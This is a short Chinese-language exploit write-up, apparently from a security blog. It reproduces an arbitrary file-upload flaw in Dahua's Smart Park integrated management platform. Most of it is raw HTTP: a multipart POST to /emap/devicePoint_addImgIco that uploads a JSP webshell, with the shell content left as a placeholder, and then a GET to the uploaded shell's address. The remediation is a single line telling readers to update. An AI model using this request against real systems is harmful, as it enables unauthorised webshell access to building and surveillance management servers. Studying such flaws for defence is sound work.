0x01 前言
0x02 影响平台
大华智慧园区综合管理平台
0x03 漏洞复现
页面是这个酱紫
EXP:
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 192.168.2.11:81
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 224
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
马子内容
--f3aeb22be281d77542546a2f71e20982--
上传成功会返回文件名ico_xxx_***.jsp
Success~
GET /upload/emap/society_new/ico_res_845ebece1736_on.jsp HTTP/1.1
Host: 192.168.2.11:81
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
shell地址:
http://192.168.2.11:81/upload/emap/society_new/ico_res_845ebece1736_on.jsp
0x04 参考来源
https://mp.weixin.qq.com/s/jk9zWDU5EEGVMpAQ6d0ocw
0x05 修复方案
建议及时更新至最新版本!
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...